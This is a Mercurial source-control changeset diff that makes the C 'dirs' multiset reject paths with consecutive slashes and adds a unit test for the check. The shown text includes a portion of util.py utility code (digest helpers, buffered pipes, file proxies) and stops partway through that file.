dirs: reject consecutive slashes in paths...
Augie Fackler
r43799:5d40317d default
@@ -0,0 +1,27 b''
1 from __future__ import absolute_import
2
3 import unittest
4
5 import silenttestrunner
6
7 from mercurial import util
8
9
10 class dirstests(unittest.TestCase):
11 def testdirs(self):
12 for case, want in [
13 (b'a/a/a', [b'a', b'a/a', b'']),
14 (b'alpha/beta/gamma', [b'', b'alpha', b'alpha/beta']),
15 ]:
16 d = util.dirs({})
17 d.addpath(case)
18 self.assertEqual(sorted(d), sorted(want))
19
20 def testinvalid(self):
21 with self.assertRaises(ValueError):
22 d = util.dirs({})
23 d.addpath(b'a//b')
24
25
26 if __name__ == '__main__':
27 silenttestrunner.main(__name__)
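For context, a usage sketch of the API this test exercises (assuming a build where the C extension backs util.dirs; the paths are illustrative):

    from mercurial import util

    d = util.dirs({})
    d.addpath(b'alpha/beta/gamma')  # records b'', b'alpha', b'alpha/beta'
    assert b'alpha/beta' in d

    try:
        d.addpath(b'a//b')  # consecutive slashes are now rejected
    except ValueError:
        pass  # "found invalid consecutive slashes in path"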
@@ -1,305 +1,313 b''
1 1 /*
2 2 dirs.c - dynamic directory diddling for dirstates
3 3
4 4 Copyright 2013 Facebook
5 5
6 6 This software may be used and distributed according to the terms of
7 7 the GNU General Public License, incorporated herein by reference.
8 8 */
9 9
10 10 #define PY_SSIZE_T_CLEAN
11 11 #include <Python.h>
12 12
13 13 #include "util.h"
14 14
15 15 #ifdef IS_PY3K
16 16 #define PYLONG_VALUE(o) ((PyLongObject *)o)->ob_digit[1]
17 17 #else
18 18 #define PYLONG_VALUE(o) PyInt_AS_LONG(o)
19 19 #endif
20 20
21 21 /*
22 22 * This is a multiset of directory names, built from the files that
23 23 * appear in a dirstate or manifest.
24 24 *
25 25 * A few implementation notes:
26 26 *
27 27 * We modify Python integers for refcounting, but those integers are
28 28 * never visible to Python code.
29 29 */
30 30 /* clang-format off */
31 31 typedef struct {
32 32 PyObject_HEAD
33 33 PyObject *dict;
34 34 } dirsObject;
35 35 /* clang-format on */
36 36
37 37 static inline Py_ssize_t _finddir(const char *path, Py_ssize_t pos)
38 38 {
39 39 while (pos != -1) {
40 40 if (path[pos] == '/')
41 41 break;
42 42 pos -= 1;
43 43 }
44 44 if (pos == -1) {
45 45 return 0;
46 46 }
47 47
48 48 return pos;
49 49 }
50 50
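_finddir scans backwards from pos to the previous '/', returning 0 once the start of the string is reached, so the _addpath loop below visits each ancestor directory from deepest to shallowest. Roughly the same enumeration in Python, as a sketch (finddirs_py is an illustrative name, not Mercurial's):

    def finddirs_py(path):
        # Yield ancestors of b'a/b/c' as b'a/b', b'a', then the b'' root.
        pos = path.rfind(b'/')
        while pos != -1:
            yield path[:pos]
            pos = path.rfind(b'/', 0, pos)
        yield b''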
51 51 static int _addpath(PyObject *dirs, PyObject *path)
52 52 {
53 53 const char *cpath = PyBytes_AS_STRING(path);
54 54 Py_ssize_t pos = PyBytes_GET_SIZE(path);
55 55 PyObject *key = NULL;
56 56 int ret = -1;
57 57
58 58 /* This loop is super critical for performance. That's why we inline
59 59 * access to Python structs instead of going through a supported API.
60 60 * The implementation, therefore, is heavily dependent on CPython
61 61 * implementation details. We also commit violations of the Python
62 62 * "protocol" such as mutating immutable objects. But since we only
63 63 * mutate objects created in this function or in other well-defined
64 64 * locations, the references are known so these violations should go
65 65 * unnoticed. */
66 66 while ((pos = _finddir(cpath, pos - 1)) != -1) {
67 67 PyObject *val;
68 68
69 /* Sniff for trailing slashes, a marker of an invalid input. */
70 if (pos > 0 && cpath[pos - 1] == '/') {
71 PyErr_SetString(
72 PyExc_ValueError,
73 "found invalid consecutive slashes in path");
74 goto bail;
75 }
76
69 77 key = PyBytes_FromStringAndSize(cpath, pos);
70 78 if (key == NULL)
71 79 goto bail;
72 80
73 81 val = PyDict_GetItem(dirs, key);
74 82 if (val != NULL) {
75 83 PYLONG_VALUE(val) += 1;
76 84 Py_CLEAR(key);
77 85 break;
78 86 }
79 87
80 88 /* Force Python to not reuse a small shared int. */
81 89 #ifdef IS_PY3K
82 90 val = PyLong_FromLong(0x1eadbeef);
83 91 #else
84 92 val = PyInt_FromLong(0x1eadbeef);
85 93 #endif
86 94
87 95 if (val == NULL)
88 96 goto bail;
89 97
90 98 PYLONG_VALUE(val) = 1;
91 99 ret = PyDict_SetItem(dirs, key, val);
92 100 Py_DECREF(val);
93 101 if (ret == -1)
94 102 goto bail;
95 103 Py_CLEAR(key);
96 104 }
97 105 ret = 0;
98 106
99 107 bail:
100 108 Py_XDECREF(key);
101 109
102 110 return ret;
103 111 }
104 112
105 113 static int _delpath(PyObject *dirs, PyObject *path)
106 114 {
107 115 char *cpath = PyBytes_AS_STRING(path);
108 116 Py_ssize_t pos = PyBytes_GET_SIZE(path);
109 117 PyObject *key = NULL;
110 118 int ret = -1;
111 119
112 120 while ((pos = _finddir(cpath, pos - 1)) != -1) {
113 121 PyObject *val;
114 122
115 123 key = PyBytes_FromStringAndSize(cpath, pos);
116 124
117 125 if (key == NULL)
118 126 goto bail;
119 127
120 128 val = PyDict_GetItem(dirs, key);
121 129 if (val == NULL) {
122 130 PyErr_SetString(PyExc_ValueError,
123 131 "expected a value, found none");
124 132 goto bail;
125 133 }
126 134
127 135 if (--PYLONG_VALUE(val) <= 0) {
128 136 if (PyDict_DelItem(dirs, key) == -1)
129 137 goto bail;
130 138 } else
131 139 break;
132 140 Py_CLEAR(key);
133 141 }
134 142 ret = 0;
135 143
136 144 bail:
137 145 Py_XDECREF(key);
138 146
139 147 return ret;
140 148 }
141 149
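Together, _addpath and _delpath maintain a refcounted multiset: _addpath stops climbing as soon as it reaches a directory that is already present (its ancestors were counted when it first appeared), and _delpath deletes a key only when its count reaches zero. A minimal pure-Python model of that bookkeeping (a sketch under those assumptions, not Mercurial's actual pure-Python fallback; it reuses the illustrative finddirs_py sketched above):

    class dirsmodel(object):
        def __init__(self):
            self._dirs = {}  # directory name -> reference count

        def addpath(self, path):
            if b'//' in path:  # mirrors the new sniff in the C code
                raise ValueError('found invalid consecutive slashes in path')
            for d in finddirs_py(path):
                if d in self._dirs:
                    self._dirs[d] += 1
                    return  # ancestors were already counted
                self._dirs[d] = 1

        def delpath(self, path):
            for d in finddirs_py(path):
                self._dirs[d] -= 1
                if self._dirs[d] > 0:
                    return
                del self._dirs[d]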
142 150 static int dirs_fromdict(PyObject *dirs, PyObject *source, char skipchar)
143 151 {
144 152 PyObject *key, *value;
145 153 Py_ssize_t pos = 0;
146 154
147 155 while (PyDict_Next(source, &pos, &key, &value)) {
148 156 if (!PyBytes_Check(key)) {
149 157 PyErr_SetString(PyExc_TypeError, "expected string key");
150 158 return -1;
151 159 }
152 160 if (skipchar) {
153 161 if (!dirstate_tuple_check(value)) {
154 162 PyErr_SetString(PyExc_TypeError,
155 163 "expected a dirstate tuple");
156 164 return -1;
157 165 }
158 166 if (((dirstateTupleObject *)value)->state == skipchar)
159 167 continue;
160 168 }
161 169
162 170 if (_addpath(dirs, key) == -1)
163 171 return -1;
164 172 }
165 173
166 174 return 0;
167 175 }
168 176
169 177 static int dirs_fromiter(PyObject *dirs, PyObject *source)
170 178 {
171 179 PyObject *iter, *item = NULL;
172 180 int ret;
173 181
174 182 iter = PyObject_GetIter(source);
175 183 if (iter == NULL)
176 184 return -1;
177 185
178 186 while ((item = PyIter_Next(iter)) != NULL) {
179 187 if (!PyBytes_Check(item)) {
180 188 PyErr_SetString(PyExc_TypeError, "expected string");
181 189 break;
182 190 }
183 191
184 192 if (_addpath(dirs, item) == -1)
185 193 break;
186 194 Py_CLEAR(item);
187 195 }
188 196
189 197 ret = PyErr_Occurred() ? -1 : 0;
190 198 Py_DECREF(iter);
191 199 Py_XDECREF(item);
192 200 return ret;
193 201 }
194 202
195 203 /*
196 204 * Calculate a refcounted set of directory names for the files in a
197 205 * dirstate.
198 206 */
199 207 static int dirs_init(dirsObject *self, PyObject *args)
200 208 {
201 209 PyObject *dirs = NULL, *source = NULL;
202 210 char skipchar = 0;
203 211 int ret = -1;
204 212
205 213 self->dict = NULL;
206 214
207 215 if (!PyArg_ParseTuple(args, "|Oc:__init__", &source, &skipchar))
208 216 return -1;
209 217
210 218 dirs = PyDict_New();
211 219
212 220 if (dirs == NULL)
213 221 return -1;
214 222
215 223 if (source == NULL)
216 224 ret = 0;
217 225 else if (PyDict_Check(source))
218 226 ret = dirs_fromdict(dirs, source, skipchar);
219 227 else if (skipchar)
220 228 PyErr_SetString(PyExc_ValueError,
221 229 "skip character is only supported "
222 230 "with a dict source");
223 231 else
224 232 ret = dirs_fromiter(dirs, source);
225 233
226 234 if (ret == -1)
227 235 Py_XDECREF(dirs);
228 236 else
229 237 self->dict = dirs;
230 238
231 239 return ret;
232 240 }
233 241
234 242 PyObject *dirs_addpath(dirsObject *self, PyObject *args)
235 243 {
236 244 PyObject *path;
237 245
238 246 if (!PyArg_ParseTuple(args, "O!:addpath", &PyBytes_Type, &path))
239 247 return NULL;
240 248
241 249 if (_addpath(self->dict, path) == -1)
242 250 return NULL;
243 251
244 252 Py_RETURN_NONE;
245 253 }
246 254
247 255 static PyObject *dirs_delpath(dirsObject *self, PyObject *args)
248 256 {
249 257 PyObject *path;
250 258
251 259 if (!PyArg_ParseTuple(args, "O!:delpath", &PyBytes_Type, &path))
252 260 return NULL;
253 261
254 262 if (_delpath(self->dict, path) == -1)
255 263 return NULL;
256 264
257 265 Py_RETURN_NONE;
258 266 }
259 267
260 268 static int dirs_contains(dirsObject *self, PyObject *value)
261 269 {
262 270 return PyBytes_Check(value) ? PyDict_Contains(self->dict, value) : 0;
263 271 }
264 272
265 273 static void dirs_dealloc(dirsObject *self)
266 274 {
267 275 Py_XDECREF(self->dict);
268 276 PyObject_Del(self);
269 277 }
270 278
271 279 static PyObject *dirs_iter(dirsObject *self)
272 280 {
273 281 return PyObject_GetIter(self->dict);
274 282 }
275 283
276 284 static PySequenceMethods dirs_sequence_methods;
277 285
278 286 static PyMethodDef dirs_methods[] = {
279 287 {"addpath", (PyCFunction)dirs_addpath, METH_VARARGS, "add a path"},
280 288 {"delpath", (PyCFunction)dirs_delpath, METH_VARARGS, "remove a path"},
281 289 {NULL} /* Sentinel */
282 290 };
283 291
284 292 static PyTypeObject dirsType = {PyVarObject_HEAD_INIT(NULL, 0)};
285 293
286 294 void dirs_module_init(PyObject *mod)
287 295 {
288 296 dirs_sequence_methods.sq_contains = (objobjproc)dirs_contains;
289 297 dirsType.tp_name = "parsers.dirs";
290 298 dirsType.tp_new = PyType_GenericNew;
291 299 dirsType.tp_basicsize = sizeof(dirsObject);
292 300 dirsType.tp_dealloc = (destructor)dirs_dealloc;
293 301 dirsType.tp_as_sequence = &dirs_sequence_methods;
294 302 dirsType.tp_flags = Py_TPFLAGS_DEFAULT;
295 303 dirsType.tp_doc = "dirs";
296 304 dirsType.tp_iter = (getiterfunc)dirs_iter;
297 305 dirsType.tp_methods = dirs_methods;
298 306 dirsType.tp_init = (initproc)dirs_init;
299 307
300 308 if (PyType_Ready(&dirsType) < 0)
301 309 return;
302 310 Py_INCREF(&dirsType);
303 311
304 312 PyModule_AddObject(mod, "dirs", (PyObject *)&dirsType);
305 313 }
@@ -1,3660 +1,3664 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import attr
38 38 from .pycompat import (
39 39 delattr,
40 40 getattr,
41 41 open,
42 42 setattr,
43 43 )
44 44 from hgdemandimport import tracing
45 45 from . import (
46 46 encoding,
47 47 error,
48 48 i18n,
49 49 node as nodemod,
50 50 policy,
51 51 pycompat,
52 52 urllibcompat,
53 53 )
54 54 from .utils import (
55 55 compression,
56 56 procutil,
57 57 stringutil,
58 58 )
59 59
60 60 rustdirs = policy.importrust(r'dirstate', r'Dirs')
61 61
62 62 base85 = policy.importmod(r'base85')
63 63 osutil = policy.importmod(r'osutil')
64 64 parsers = policy.importmod(r'parsers')
65 65
66 66 b85decode = base85.b85decode
67 67 b85encode = base85.b85encode
68 68
69 69 cookielib = pycompat.cookielib
70 70 httplib = pycompat.httplib
71 71 pickle = pycompat.pickle
72 72 safehasattr = pycompat.safehasattr
73 73 socketserver = pycompat.socketserver
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 if pycompat.iswindows:
87 87 from . import windows as platform
88 88 else:
89 89 from . import posix as platform
90 90
91 91 _ = i18n._
92 92
93 93 bindunixsocket = platform.bindunixsocket
94 94 cachestat = platform.cachestat
95 95 checkexec = platform.checkexec
96 96 checklink = platform.checklink
97 97 copymode = platform.copymode
98 98 expandglobs = platform.expandglobs
99 99 getfsmountpoint = platform.getfsmountpoint
100 100 getfstype = platform.getfstype
101 101 groupmembers = platform.groupmembers
102 102 groupname = platform.groupname
103 103 isexec = platform.isexec
104 104 isowner = platform.isowner
105 105 listdir = osutil.listdir
106 106 localpath = platform.localpath
107 107 lookupreg = platform.lookupreg
108 108 makedir = platform.makedir
109 109 nlinks = platform.nlinks
110 110 normpath = platform.normpath
111 111 normcase = platform.normcase
112 112 normcasespec = platform.normcasespec
113 113 normcasefallback = platform.normcasefallback
114 114 openhardlinks = platform.openhardlinks
115 115 oslink = platform.oslink
116 116 parsepatchoutput = platform.parsepatchoutput
117 117 pconvert = platform.pconvert
118 118 poll = platform.poll
119 119 posixfile = platform.posixfile
120 120 readlink = platform.readlink
121 121 rename = platform.rename
122 122 removedirs = platform.removedirs
123 123 samedevice = platform.samedevice
124 124 samefile = platform.samefile
125 125 samestat = platform.samestat
126 126 setflags = platform.setflags
127 127 split = platform.split
128 128 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
129 129 statisexec = platform.statisexec
130 130 statislink = platform.statislink
131 131 umask = platform.umask
132 132 unlink = platform.unlink
133 133 username = platform.username
134 134
135 135 # small compat layer
136 136 compengines = compression.compengines
137 137 SERVERROLE = compression.SERVERROLE
138 138 CLIENTROLE = compression.CLIENTROLE
139 139
140 140 try:
141 141 recvfds = osutil.recvfds
142 142 except AttributeError:
143 143 pass
144 144
145 145 # Python compatibility
146 146
147 147 _notset = object()
148 148
149 149
150 150 def bitsfrom(container):
151 151 bits = 0
152 152 for bit in container:
153 153 bits |= bit
154 154 return bits
155 155
156 156
157 157 # Python 2.6 still has deprecation warnings enabled by default. We do not want
158 158 # to display anything to regular users, so detect if we are running tests and
159 159 # only enable Python deprecation warnings in that case.
160 160 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
161 161 if _dowarn:
162 162 # explicitly unfilter our warning for python 2.7
163 163 #
164 164 # The option of setting PYTHONWARNINGS in the test runner was investigated.
165 165 # However, module name set through PYTHONWARNINGS was exactly matched, so
166 166 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
167 167 # makes the whole PYTHONWARNINGS thing useless for our usecase.
168 168 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
169 169 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
170 170 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
171 171 if _dowarn and pycompat.ispy3:
172 172 # silence warning emitted by passing user string to re.sub()
173 173 warnings.filterwarnings(
174 174 r'ignore', r'bad escape', DeprecationWarning, r'mercurial'
175 175 )
176 176 warnings.filterwarnings(
177 177 r'ignore', r'invalid escape sequence', DeprecationWarning, r'mercurial'
178 178 )
179 179 # TODO: reinvent imp.is_frozen()
180 180 warnings.filterwarnings(
181 181 r'ignore',
182 182 r'the imp module is deprecated',
183 183 DeprecationWarning,
184 184 r'mercurial',
185 185 )
186 186
187 187
188 188 def nouideprecwarn(msg, version, stacklevel=1):
189 189 """Issue an python native deprecation warning
190 190
191 191 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
192 192 """
193 193 if _dowarn:
194 194 msg += (
195 195 b"\n(compatibility will be dropped after Mercurial-%s,"
196 196 b" update your code.)"
197 197 ) % version
198 198 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
199 199
200 200
201 201 DIGESTS = {
202 202 b'md5': hashlib.md5,
203 203 b'sha1': hashlib.sha1,
204 204 b'sha512': hashlib.sha512,
205 205 }
206 206 # List of digest types from strongest to weakest
207 207 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
208 208
209 209 for k in DIGESTS_BY_STRENGTH:
210 210 assert k in DIGESTS
211 211
212 212
213 213 class digester(object):
214 214 """helper to compute digests.
215 215
216 216 This helper can be used to compute one or more digests given their name.
217 217
218 218 >>> d = digester([b'md5', b'sha1'])
219 219 >>> d.update(b'foo')
220 220 >>> [k for k in sorted(d)]
221 221 ['md5', 'sha1']
222 222 >>> d[b'md5']
223 223 'acbd18db4cc2f85cedef654fccc4a4d8'
224 224 >>> d[b'sha1']
225 225 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
226 226 >>> digester.preferred([b'md5', b'sha1'])
227 227 'sha1'
228 228 """
229 229
230 230 def __init__(self, digests, s=b''):
231 231 self._hashes = {}
232 232 for k in digests:
233 233 if k not in DIGESTS:
234 234 raise error.Abort(_(b'unknown digest type: %s') % k)
235 235 self._hashes[k] = DIGESTS[k]()
236 236 if s:
237 237 self.update(s)
238 238
239 239 def update(self, data):
240 240 for h in self._hashes.values():
241 241 h.update(data)
242 242
243 243 def __getitem__(self, key):
244 244 if key not in DIGESTS:
245 245 raise error.Abort(_(b'unknown digest type: %s') % key)
246 246 return nodemod.hex(self._hashes[key].digest())
247 247
248 248 def __iter__(self):
249 249 return iter(self._hashes)
250 250
251 251 @staticmethod
252 252 def preferred(supported):
253 253 """returns the strongest digest type in both supported and DIGESTS."""
254 254
255 255 for k in DIGESTS_BY_STRENGTH:
256 256 if k in supported:
257 257 return k
258 258 return None
259 259
260 260
261 261 class digestchecker(object):
262 262 """file handle wrapper that additionally checks content against a given
263 263 size and digests.
264 264
265 265 d = digestchecker(fh, size, {'md5': '...'})
266 266
267 267 When multiple digests are given, all of them are validated.
268 268 """
269 269
270 270 def __init__(self, fh, size, digests):
271 271 self._fh = fh
272 272 self._size = size
273 273 self._got = 0
274 274 self._digests = dict(digests)
275 275 self._digester = digester(self._digests.keys())
276 276
277 277 def read(self, length=-1):
278 278 content = self._fh.read(length)
279 279 self._digester.update(content)
280 280 self._got += len(content)
281 281 return content
282 282
283 283 def validate(self):
284 284 if self._size != self._got:
285 285 raise error.Abort(
286 286 _(b'size mismatch: expected %d, got %d')
287 287 % (self._size, self._got)
288 288 )
289 289 for k, v in self._digests.items():
290 290 if v != self._digester[k]:
291 291 # i18n: first parameter is a digest name
292 292 raise error.Abort(
293 293 _(b'%s mismatch: expected %s, got %s')
294 294 % (k, v, self._digester[k])
295 295 )
296 296
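A usage sketch for digestchecker, wrapping an in-memory file (the payload is illustrative; note that the expected digest is a hex byte string, matching what digester.__getitem__ returns):

    import hashlib
    import io

    payload = b'some bundle content'
    expected = {b'sha1': hashlib.sha1(payload).hexdigest().encode('ascii')}

    fh = digestchecker(io.BytesIO(payload), len(payload), expected)
    while fh.read(4096):
        pass
    fh.validate()  # raises error.Abort on a size or digest mismatch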
297 297
298 298 try:
299 299 buffer = buffer
300 300 except NameError:
301 301
302 302 def buffer(sliceable, offset=0, length=None):
303 303 if length is not None:
304 304 return memoryview(sliceable)[offset : offset + length]
305 305 return memoryview(sliceable)[offset:]
306 306
307 307
308 308 _chunksize = 4096
309 309
310 310
311 311 class bufferedinputpipe(object):
312 312 """a manually buffered input pipe
313 313
314 314 Python will not let us use buffered IO and lazy reading with 'polling' at
315 315 the same time. We cannot probe the buffer state and select will not detect
316 316 that data are ready to read if they are already buffered.
317 317
318 318 This class lets us work around that by implementing its own buffering
319 319 (allowing efficient readline) while offering a way to know if the buffer is
320 320 empty from the output (allowing collaboration of the buffer with polling).
321 321
322 322 This class lives in the 'util' module because it makes use of the 'os'
323 323 module from the python stdlib.
324 324 """
325 325
326 326 def __new__(cls, fh):
327 327 # If we receive a fileobjectproxy, we need to use a variation of this
328 328 # class that notifies observers about activity.
329 329 if isinstance(fh, fileobjectproxy):
330 330 cls = observedbufferedinputpipe
331 331
332 332 return super(bufferedinputpipe, cls).__new__(cls)
333 333
334 334 def __init__(self, input):
335 335 self._input = input
336 336 self._buffer = []
337 337 self._eof = False
338 338 self._lenbuf = 0
339 339
340 340 @property
341 341 def hasbuffer(self):
342 342 """True is any data is currently buffered
343 343
344 344 This will be used externally a pre-step for polling IO. If there is
345 345 already data then no polling should be set in place."""
346 346 return bool(self._buffer)
347 347
348 348 @property
349 349 def closed(self):
350 350 return self._input.closed
351 351
352 352 def fileno(self):
353 353 return self._input.fileno()
354 354
355 355 def close(self):
356 356 return self._input.close()
357 357
358 358 def read(self, size):
359 359 while (not self._eof) and (self._lenbuf < size):
360 360 self._fillbuffer()
361 361 return self._frombuffer(size)
362 362
363 363 def unbufferedread(self, size):
364 364 if not self._eof and self._lenbuf == 0:
365 365 self._fillbuffer(max(size, _chunksize))
366 366 return self._frombuffer(min(self._lenbuf, size))
367 367
368 368 def readline(self, *args, **kwargs):
369 369 if len(self._buffer) > 1:
370 370 # this should not happen because both read and readline end with a
371 371 # _frombuffer call that collapses it.
372 372 self._buffer = [b''.join(self._buffer)]
373 373 self._lenbuf = len(self._buffer[0])
374 374 lfi = -1
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find(b'\n')
377 377 while (not self._eof) and lfi < 0:
378 378 self._fillbuffer()
379 379 if self._buffer:
380 380 lfi = self._buffer[-1].find(b'\n')
381 381 size = lfi + 1
382 382 if lfi < 0: # end of file
383 383 size = self._lenbuf
384 384 elif len(self._buffer) > 1:
385 385 # we need to take previous chunks into account
386 386 size += self._lenbuf - len(self._buffer[-1])
387 387 return self._frombuffer(size)
388 388
389 389 def _frombuffer(self, size):
390 390 """return at most 'size' data from the buffer
391 391
392 392 The data are removed from the buffer."""
393 393 if size == 0 or not self._buffer:
394 394 return b''
395 395 buf = self._buffer[0]
396 396 if len(self._buffer) > 1:
397 397 buf = b''.join(self._buffer)
398 398
399 399 data = buf[:size]
400 400 buf = buf[len(data) :]
401 401 if buf:
402 402 self._buffer = [buf]
403 403 self._lenbuf = len(buf)
404 404 else:
405 405 self._buffer = []
406 406 self._lenbuf = 0
407 407 return data
408 408
409 409 def _fillbuffer(self, size=_chunksize):
410 410 """read data to the buffer"""
411 411 data = os.read(self._input.fileno(), size)
412 412 if not data:
413 413 self._eof = True
414 414 else:
415 415 self._lenbuf += len(data)
416 416 self._buffer.append(data)
417 417
418 418 return data
419 419
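A sketch of the intended usage pattern: consult hasbuffer first, and only poll the underlying descriptor when nothing is buffered (POSIX pipe; names are illustrative):

    import os
    import select

    rfd, wfd = os.pipe()
    os.write(wfd, b'hello\nworld\n')

    pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))
    if not pipe.hasbuffer:
        # Safe to poll: no data is hiding in a userspace buffer.
        select.select([pipe.fileno()], [], [], 1.0)
    print(pipe.readline())  # b'hello\n'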
420 420
421 421 def mmapread(fp):
422 422 try:
423 423 fd = getattr(fp, 'fileno', lambda: fp)()
424 424 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
425 425 except ValueError:
426 426 # Empty files cannot be mmapped, but mmapread should still work. Check
427 427 # if the file is empty, and if so, return an empty buffer.
428 428 if os.fstat(fd).st_size == 0:
429 429 return b''
430 430 raise
431 431
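A short usage sketch for mmapread (the file name is hypothetical):

    with open('revlog-data.bin', 'wb') as fp:
        fp.write(b'\x00' * 1024)

    with open('revlog-data.bin', 'rb') as fp:
        data = mmapread(fp)  # mmap view of the file; b'' for an empty file
    print(len(data))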
432 432
433 433 class fileobjectproxy(object):
434 434 """A proxy around file objects that tells a watcher when events occur.
435 435
436 436 This type is intended to only be used for testing purposes. Think hard
437 437 before using it in important code.
438 438 """
439 439
440 440 __slots__ = (
441 441 r'_orig',
442 442 r'_observer',
443 443 )
444 444
445 445 def __init__(self, fh, observer):
446 446 object.__setattr__(self, r'_orig', fh)
447 447 object.__setattr__(self, r'_observer', observer)
448 448
449 449 def __getattribute__(self, name):
450 450 ours = {
451 451 r'_observer',
452 452 # IOBase
453 453 r'close',
454 454 # closed if a property
455 455 r'fileno',
456 456 r'flush',
457 457 r'isatty',
458 458 r'readable',
459 459 r'readline',
460 460 r'readlines',
461 461 r'seek',
462 462 r'seekable',
463 463 r'tell',
464 464 r'truncate',
465 465 r'writable',
466 466 r'writelines',
467 467 # RawIOBase
468 468 r'read',
469 469 r'readall',
470 470 r'readinto',
471 471 r'write',
472 472 # BufferedIOBase
473 473 # raw is a property
474 474 r'detach',
475 475 # read defined above
476 476 r'read1',
477 477 # readinto defined above
478 478 # write defined above
479 479 }
480 480
481 481 # We only observe some methods.
482 482 if name in ours:
483 483 return object.__getattribute__(self, name)
484 484
485 485 return getattr(object.__getattribute__(self, r'_orig'), name)
486 486
487 487 def __nonzero__(self):
488 488 return bool(object.__getattribute__(self, r'_orig'))
489 489
490 490 __bool__ = __nonzero__
491 491
492 492 def __delattr__(self, name):
493 493 return delattr(object.__getattribute__(self, r'_orig'), name)
494 494
495 495 def __setattr__(self, name, value):
496 496 return setattr(object.__getattribute__(self, r'_orig'), name, value)
497 497
498 498 def __iter__(self):
499 499 return object.__getattribute__(self, r'_orig').__iter__()
500 500
501 501 def _observedcall(self, name, *args, **kwargs):
502 502 # Call the original object.
503 503 orig = object.__getattribute__(self, r'_orig')
504 504 res = getattr(orig, name)(*args, **kwargs)
505 505
506 506 # Call a method on the observer of the same name with arguments
507 507 # so it can react, log, etc.
508 508 observer = object.__getattribute__(self, r'_observer')
509 509 fn = getattr(observer, name, None)
510 510 if fn:
511 511 fn(res, *args, **kwargs)
512 512
513 513 return res
514 514
515 515 def close(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'close', *args, **kwargs
518 518 )
519 519
520 520 def fileno(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'fileno', *args, **kwargs
523 523 )
524 524
525 525 def flush(self, *args, **kwargs):
526 526 return object.__getattribute__(self, r'_observedcall')(
527 527 r'flush', *args, **kwargs
528 528 )
529 529
530 530 def isatty(self, *args, **kwargs):
531 531 return object.__getattribute__(self, r'_observedcall')(
532 532 r'isatty', *args, **kwargs
533 533 )
534 534
535 535 def readable(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readable', *args, **kwargs
538 538 )
539 539
540 540 def readline(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readline', *args, **kwargs
543 543 )
544 544
545 545 def readlines(self, *args, **kwargs):
546 546 return object.__getattribute__(self, r'_observedcall')(
547 547 r'readlines', *args, **kwargs
548 548 )
549 549
550 550 def seek(self, *args, **kwargs):
551 551 return object.__getattribute__(self, r'_observedcall')(
552 552 r'seek', *args, **kwargs
553 553 )
554 554
555 555 def seekable(self, *args, **kwargs):
556 556 return object.__getattribute__(self, r'_observedcall')(
557 557 r'seekable', *args, **kwargs
558 558 )
559 559
560 560 def tell(self, *args, **kwargs):
561 561 return object.__getattribute__(self, r'_observedcall')(
562 562 r'tell', *args, **kwargs
563 563 )
564 564
565 565 def truncate(self, *args, **kwargs):
566 566 return object.__getattribute__(self, r'_observedcall')(
567 567 r'truncate', *args, **kwargs
568 568 )
569 569
570 570 def writable(self, *args, **kwargs):
571 571 return object.__getattribute__(self, r'_observedcall')(
572 572 r'writable', *args, **kwargs
573 573 )
574 574
575 575 def writelines(self, *args, **kwargs):
576 576 return object.__getattribute__(self, r'_observedcall')(
577 577 r'writelines', *args, **kwargs
578 578 )
579 579
580 580 def read(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'read', *args, **kwargs
583 583 )
584 584
585 585 def readall(self, *args, **kwargs):
586 586 return object.__getattribute__(self, r'_observedcall')(
587 587 r'readall', *args, **kwargs
588 588 )
589 589
590 590 def readinto(self, *args, **kwargs):
591 591 return object.__getattribute__(self, r'_observedcall')(
592 592 r'readinto', *args, **kwargs
593 593 )
594 594
595 595 def write(self, *args, **kwargs):
596 596 return object.__getattribute__(self, r'_observedcall')(
597 597 r'write', *args, **kwargs
598 598 )
599 599
600 600 def detach(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'detach', *args, **kwargs
603 603 )
604 604
605 605 def read1(self, *args, **kwargs):
606 606 return object.__getattribute__(self, r'_observedcall')(
607 607 r'read1', *args, **kwargs
608 608 )
609 609
610 610
611 611 class observedbufferedinputpipe(bufferedinputpipe):
